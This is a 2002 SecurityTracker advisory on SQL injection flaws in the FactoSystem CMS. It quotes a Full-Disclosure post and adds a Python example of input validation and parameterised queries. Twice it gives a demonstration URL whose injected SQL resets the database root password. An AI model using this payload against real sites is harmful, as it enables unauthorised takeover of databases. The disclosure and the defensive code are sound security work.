SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   FactoSystem
Vendors:   facto.sourceforge.net
FactoSystem Web Publishing System Input Validation Bugs Let Remote Users Execute SQL Commands on the Underlying Database
SecurityTracker Alert ID:  1005162
SecurityTracker URL:  http://securitytracker.com/id/1005162
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Aug 31 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  

Description:   Some input validation vulnerabilities were reported in the FactoSystem content management system. A remote user can execute arbitrary SQL commands on the underlying database server.

Multiple SQL injection vulnerabilities were reported in FactoSystem. The system reportedly does not properly filter certain user-supplied control characters and does not validate user-supplied numeric data. The affected variables include "authornumber" in author.asp, "discussblurbid" in discuss.asp, and the form variables "name" and "email" in holdcomment.asp.

A demonstration exploit URL is provided:

http://localhost/author.asp?authornumber=1%28%20And%20AuthorTable%2EAuthorID
%3DBlurbTable%2EAuthorID%20And%20BlurbTable%2ESub_id%3DSubjectTable%2ESub_id
%20Order%20By%20BlurbTable%2EBlurbdate%20desc%2C%20blurbtable%2Eblurbtime%20
desc%3BUPDATE%20user%20SET%20Password%3DPASSWORD%28%27password%27%29%20WHERE
%20user%3D%27root%27%3B%20FLUSH%20PRIVILEGES%3B--

Impact:   A remote user can execute arbitrary SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  facto.sourceforge.net/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.
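
The two causes named in the description (numeric data that is not validated, strings whose control characters are not escaped) map to two checks, sketched here as an added example that is not FactoSystem code. Python with sqlite3 stands in for the ASP application and its database; the schema, the HeldComment table and all function names are assumptions, and PAGE_URL is only the leading part of the demonstration URL above.

```python
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Leading part of the demonstration URL on this page (truncated, not the full value).
PAGE_URL = ("http://localhost/author.asp?authornumber="
            "1%28%20And%20AuthorTable%2EAuthorID%3DBlurbTable%2EAuthorID")
GOOD_URL = "http://localhost/author.asp?authornumber=1"  # constructed benign request

def make_db():
    # Assumed schema: only AuthorTable.AuthorID is named on the page; the rest is constructed.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE AuthorTable (AuthorID INTEGER PRIMARY KEY, Name TEXT)")
    db.execute("CREATE TABLE HeldComment (name TEXT, email TEXT)")
    db.executemany("INSERT INTO AuthorTable VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return db

def parse_authornumber(url):
    """Return authornumber as an int, or None unless it is 1-9 ASCII decimal digits."""
    values = parse_qs(urlsplit(url).query).get("authornumber", [])
    if len(values) != 1:          # missing or repeated parameter
        return None
    raw = values[0]
    # str.isdigit() also accepts non-ASCII digits, so require ASCII as well.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        return None
    return int(raw)

def lookup_author(db, url):
    author_id = parse_authornumber(url)
    if author_id is None:
        return None               # reject before any SQL is built
    # The value is bound as a parameter, never concatenated into the statement.
    row = db.execute("SELECT Name FROM AuthorTable WHERE AuthorID = ?",
                     (author_id,)).fetchone()
    return row[0] if row else None

def hold_comment(db, name, email):
    # String fields are bound too, so quotes and other control characters are stored as data.
    db.execute("INSERT INTO HeldComment (name, email) VALUES (?, ?)", (name, email))
    return db.execute("SELECT name, email FROM HeldComment").fetchall()

if __name__ == "__main__":
    db = make_db()
    print(lookup_author(db, GOOD_URL), lookup_author(db, PAGE_URL))
    print(hold_comment(db, "O'Brien", "ob@example.org"))
```
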


 Source Message Contents

Subject:  [Full-Disclosure] FactoSystem CMS Contains Multiple Vulnerabilities


FactoSystem CMS Contains Multiple Vulnerabilities

Impact: Multiple vulnerabilities -- all allowing manipulation of the backend
database
Risk: High
Class: Input Validation Error
Affected System: IIS 4.0 or later with ASP enabled and FactoSystem CMS
installed

Description

Multiple SQL injection vulnerabilities exist in the FactoSystem Content
Management System that may allow an attacker to introduce instructions into
an SQL query.  The vulnerabilities exist because the script fails to verify
the validity of numeric data or fails to properly escape certain control
characters in strings.

The problems are in the handling of the query variables "authornumber" (in
author.asp), and "discussblurbid" (in discuss.asp), and the form variables
"name" and "email" (in holdcomment.asp).  An example is below:

http://localhost/author.asp?authornumber=1%28%20And%20AuthorTable%2EAuthorID
%3DBlurbTable%2EAuthorID%20And%20BlurbTable%2ESub_id%3DSubjectTable%2ESub_id
%20Order%20By%20BlurbTable%2EBlurbdate%20desc%2C%20blurbtable%2Eblurbtime%20
desc%3BUPDATE%20user%20SET%20Password%3DPASSWORD%28%27password%27%29%20WHERE
%20user%3D%27root%27%3B%20FLUSH%20PRIVILEGES%3B--
